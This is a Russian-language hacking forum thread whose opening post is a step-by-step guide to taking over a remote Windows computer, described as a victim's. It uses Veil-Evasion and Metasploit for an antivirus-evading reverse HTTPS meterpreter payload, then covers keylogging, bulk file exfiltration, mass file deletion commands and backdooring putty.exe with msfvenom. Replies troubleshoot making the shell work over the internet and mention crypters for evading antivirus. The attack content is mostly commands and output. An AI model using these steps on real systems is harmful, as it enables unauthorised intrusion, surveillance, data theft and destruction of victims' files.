Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
А если убрать роутер у саседа, сработает??? и если Будет жертва на другом провайдере???

Успешность проведения зависит от : Антивирус, Фаэрвол, Политика безопасности на роутере или самой сети. При самой распространеной схеме у Вас не должно возникнуть проблем. Сделайте так, как я описал постом выше и сообщите о результате. Только внимательно прочтите.
 
F

for(i=0;i<225;i++);

1) В частности, может прокатить и так, без вмешательство в настройки на стороне тестируемого. Делаем проброс на свей железке и ждем, так как при запуске файла на тестируемой системе код должен сам начать стучаться в Ваш порт (который откроете на роутере)

2) Если система и железо настроено хорошо у тестируемого, то никто не выпустит из системы утилиту, коорая очень хочет соедениться на каком то порту с удаленной системой

Сейчас, с другом, Вы можете поступить следующим образом: Вы пробросите у себя порты, настроите верно файл (куда впишите Ваш инетовский адрес и порт, на котором будете ждать коннект), Ваш друг выключит АВ и фаэрволы и запустит, при этом не забыв, если на железе тоже стоит защита, отключить ее.

ПС Вариант с пробросом на 2-х системах мною было предложено для того, что бы вы могли полноценно начать тестировать и понимать принцип работы. По поводу жертв и взломов - тут немного другой ресурс, как взломать жертву и т.д. это на другой адрес.
или если открыть порт в armitage у себя, этого мало всеравно ???нужно лезть в свой роутер?
[doublepost=1483816990,1483816538][/doublepost]
Успешность проведения зависит от : Антивирус, Фаэрвол, Политика безопасности на роутере или самой сети. При самой распространеной схеме у Вас не должно возникнуть проблем. Сделайте так, как я описал постом выше и сообщите о результате. Только внимательно прочтите.

Помогите настроить роутер zyxel |||
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
или если открыть порт в armitage у себя, этого мало всеравно
Открыть надо и на ОС и на роутере своем, если он есть, иначе как Вы получите соеденение? Армитаж может САМ открыть порт только на ОС, на роутер у него же доступа нет - руками надо.

Помогите настроить роутер zyxel |||

На оф сайте zyxel все есть и текст на русском и картинки
 
F

for(i=0;i<225;i++);

Открыть надо и на ОС и на роутере своем, если он есть, иначе как Вы получите соеденение? Армитаж может САМ открыть порт только на ОС, на роутер у него же доступа нет - руками надо.



На оф сайте zyxel все есть и текст на русском и картинки
***Скрытый текст***

Если к примеру я создал файлик bat
powershell/meterpreter/rev_https
то в роуторе я должен указать tcp/443 и перенаправить на нужный мне порт к примеру 8977 ???
 
Последнее редактирование модератором:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
то в роуторе я должен указать tcp/443 и перенаправить на нужный мне порт к примеру 8977 ???

Если в файле указан порт 8977, и этот порт стоит на листинге в ОС Вашей, значит в роутере должен стоять открытым и смотреть в Инет 8977 и перенаправляться на 8977 в локалку.
 
F

for(i=0;i<225;i++);

Если в файле указан порт 8977, и этот порт стоит на листинге в ОС Вашей, значит в роутере должен стоять открытым и смотреть в Инет 8977 и перенаправляться на 8977 в локалку.
Подскажите инструкцию куда и как я должен настроить linux kali по порту указаному выше???
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Подскажите инструкцию куда и как я должен настроить linux kali по порту указаному выше???

Вы порт указываете при работе с Veil-Evasion, создавая нагрузку ( файл). Верно? Затем этот же порт открываем при помощи
Запускаем Metasploit.
#msfconsole

Прочитайте внимательно первый пост - там все очень четко разложено.
 
F

for(i=0;i<225;i++);

Вы порт указываете при работе с Veil-Evasion, создавая нагрузку ( файл). Верно? Затем этот же порт открываем при помощи
Запускаем Metasploit.
#msfconsole

Прочитайте внимательно первый пост - там все очень четко разложено.
Я жи вам писал в локальной сети, Всё работает а вот на растоянии почему то нет, я сделал проброс и запустил msfconsole указал в нём такие же данные как и bat,не работает почему??? тест проводиться в реальном времени.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Я жи вам писал в локальной сети, Всё работает а вот на растоянии почему то нет

1) Система, которая сейчас идет для теста отвечает условиям? Она эдентична той, на которой сработало?
2) АВ, фаэрвол выключен?
3) На железке отключена блокировка исходящих соеденений по нестанартным портам? Часто это сделано в провайдерских роутерах, который они дают абоненту.
 
F

for(i=0;i<225;i++);

1) Система, которая сейчас идет для теста отвечает условиям? Она эдентична той, на которой сработало?
2) АВ, фаэрвол выключен?
3) На железке отключена блокировка исходящих соеденений по нестанартным портам? Часто это сделано в провайдерских роутерах, который они дают абоненту.
На подопытном кролике установлена windows 7 sp1отключены антивирус и брандмауэр, на роуторе друга порт не проброшен-так задумано а насчёт соеденений по нестанартным портам все отключено!!!
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
На подопытном кролике установлена windows 7 sp1отключены антивирус и брандмауэр, на роуторе друга порт не проброшен-так задумано а насчёт соеденений по нестанартным портам все отключено!!!

1) Стоит передалть файл на новый, так как надо указать новый порт, файл уже заклевали видимо
2) Если все у друга верно - никаких проблем быть не может. очень редко провайдер может ограничить работу по нестандартным портам на железке, которая стоит следующей после роутера. Вы бы это уточнили. К примеру Родительский Контроль, который сейчас включают удаленно не на системе абонента.
3) Вы уверены, что у друга все так же четко? Что вообще файл срабатывает? Сравните систему Вашу и Друга.
 
F

for(i=0;i<225;i++);

Я купил 2 роутера для тестов одинаковые!!!на кролике друга я установин винду с нуля как и у себя. настройки роутера идентичны моим кроме проброса!!!я уже не знаю что делать:(
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Я купил 2 роутера для тестов одинаковые!!!на кролике друга я установин винду с нуля как и у себя. настройки роутера идентичны моим кроме проброса!!!я уже не знаю что делать:(

Попробуйте сделать VPN тонель между Вашими системами, и уже используя ip внутри сети ( это как бы очень грубо у вас будет локалка ) попробовать еще раз.
 
F

for(i=0;i<225;i++);

Попробуйте сделать VPN тонель между Вашими системами, и уже используя ip внутри сети ( это как бы очень грубо у вас будет локалка ) попробовать еще раз.
Я вот не могу понять фаервол 2009года А exploit 2013-16 год, Дажи если фаервол включен почему bat. не может обойти ???антивирус аваст отключен!!!
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Я вот не могу понять фаервол 2009года А exploit 2013-16 год, Дажи если фаервол включен почему bat. не может обойти ???антивирус аваст отключен!!!

Задача фаэрвола блокировать подозрительный траффик от подозрительных процессов. Порт, через который пытается выйти батник крайне подозрителен и сам файл тоже, его бы и Аутпост 2006 года не выпустил бы.
 
F

for(i=0;i<225;i++);

Задача фаэрвола блокировать подозрительный траффик от подозрительных процессов. Порт, через который пытается выйти батник крайне подозрителен и сам файл тоже, его бы и Аутпост 2006 года не выпустил бы.
Могу ли я узнать ваши методы проникновения на растоянии???к примеру мой файл бат скачала жертва с нета, и запустила-получается так что дажи если у жертвы будет стоять самая первоя windows 7 то я не смогу проникнуть???что я могу попробывать ищё???только инструкцию впред...
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
к примеру мой файл бат скачала жертва с нета, и запустила-получается так что дажи если у жертвы будет стоять самая первоя windows 7 то я не смогу проникнуть???что я могу попробывать ищё???только инструкцию впред...

1) На стадии скачивания уже файл может быть заблокирован - нужен криптор и обход антивируса (тоже есть на форуме)
2) Если у тестируемого будет стоять боле менее вменяемый фаэрвол то батник не пройдет, надо что бы была миграция на другой процесс, доверенный
3) Все инструкции есть на форуме.
4) Скачал - законектило, Вы логику включите - у Вас 1 порт и 1 файл, если куча людей будет стучаться в порт, что произойдет?

В данном случае, Veil рассматривается как инструмент для тестирования 1 системы или несколько. Тоесть - исходя из них создается весь вектор атаки, способ реализации.
 

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: Вопрос не по теме. Возможно ли с помощью no-ip создать эмуляцию разных компьютеров в глобальной сети (на двух виртуальных машинах) для последующего пентеста ?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Возможно ли с помощью no-ip создать эмуляцию разных компьютеров в глобальной сети (на двух виртуальных машинах) для последующего пентеста ?

Не совсем понял вопрос. NO-IP позволяет сделать статический IP адрес, но не эмулировать рабочие системы. Быть может Вы имели ввиду - что есть системы для пентеста с динамическим IP, и что бы каждый раз не актуализировать IP (к примеру для своей команды тестеров) Вы желаете иметь постояный?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!